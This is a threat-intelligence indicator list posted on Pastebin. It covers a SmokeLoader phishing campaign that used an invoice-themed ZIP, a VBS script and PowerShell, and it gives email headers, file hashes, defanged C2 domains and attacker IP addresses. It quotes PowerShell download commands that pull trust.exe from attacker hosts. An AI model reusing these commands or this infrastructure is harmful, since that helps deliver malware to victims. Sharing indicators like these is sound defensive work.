Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #ZIP #PSWEB #VBS
- https://pastebin.com/DgFvarG0
- previous_contact:
- https://pastebin.com/AayUSaXq
- https://pastebin.com/RDVXCe0J
- https://pastebin.com/QpG70u8T
- https://pastebin.com/BJzcXqkK
- https://pastebin.com/kBW7nkZ5
- https://pastebin.com/Z7zq0YkW
- https://pastebin.com/b8PkhMyN
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/
- attack_vector
- --------------
- email attach .zip? > .VBS > WSH > PowerShell > URL > get download string > %temp%\*.exe
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <operator.lv01@emm.ua>
- Received: from mail.emm.ua (mail.t-sna.com [193.19.240.25])
- Received: from internal.domain; Tue, 30 May 2023 08:39:18 +0300
- Reply-To: elrayvno@ukr.net
- Date: Tue, 30 May 2023 08:39:15 +0300
- Subject: Re: акт звірки та рахунки
- From: бух. відділ <operator.lv01@emm.ua>
- Message-ID: <01bae4p-12pzcf-21@emm.ua>
- # # # # # # # #
- other senders
- # # # # # # # #
- operator.lv01[@]emm[.]ua
- support[@]romb[.]ua
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
- File name Рахунок (без ПДВ) № 28 від 28.05.2023.zip [ Zip archive data ]
- File size 65.67 KB (67242 bytes)
- SHA-256 6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4
- File name Рахунок (без ПДВ) № 28 від 28.05.2023.pdf [ PDF document, version 1.4 ] ! - CLEAN
- File size 60.86 KB (62318 bytes)
- SHA-256 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
- File name AKT_28_05_2023p._pax_28_05_2023p.vbs [ JavaScript ]
- File size 22.90 KB (23454 bytes)
- SHA-256 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
- File name trust.exe [ PE32 executable (GUI) ]
- File size 274.00 KB (280576 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR americanocoffea{ .ru > $client.downloadfile('http://americanocoffea{ .ru/antirecord/trust.exe',$path) ! - may change URL and filename
- $client.downloadfile('http://jskgdhjkdfhjdkjhd844{ .ru/antirecord/trust.exe',$path)
- C2
- polinamailserverip{ .ru/
- lamazone{ .site/
- criticalosl{ .tech/
- maximprofile{ .net/
- zaliphone{ .com/
- humanitarydp{ .ug/
- zaikaopentra{ .com.ug/
- zaikaopentra-com-ug{ .online/
- infomalilopera{ .ru/
- jskgdhjkdfhjdkjhd844{ .ru/
- jkghdj2993jdjjdjd{ .ru/
- kjhgdj99fuller{ .ru/
- azartnyjboy{ .com/
- zalamafiapopcultur{ .eu/
- hopentools{ .site/
- kismamabeforyougo{ .com/
- kissmafiabeforyoudied{ .eu/
- gondurasonline{ .ug/
- nabufixservice{ .name/
- filterfullproperty{ .ru/
- alegoomaster{ .com/
- freesitucionap{ .com/
- droopily{ .eu/
- prostotaknet{ .net/
- zakolibal{ .online/
- verycheap{ .store/
- netwrk
- --------------
- 176.124.193.111 americanocoffea{ .ru 80 HTTP GET / HTTP/1.1
- 176.124.193.111 americanocoffea{ .ru 80 HTTP GET /antirecord/trust.exe HTTP/1.1
- comp
- --------------
- 195.123.219.57 freesitucionap{ .com 80 HTTP POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- proc
- --------------
- persist
- --------------
- n/a
- drop
- --------------
- C:\Users\%username%\AppData\Local\Temp\%random%.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- n/a
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088/details
- https://www.virustotal.com/gui/file/6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4/details
- https://www.virustotal.com/gui/file/375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936/details
- https://www.virustotal.com/gui/file/9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330/details
- https://analyze.intezer.com/analyses/f6d5cfe5-181c-490f-8551-ae9bc12b64c3
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement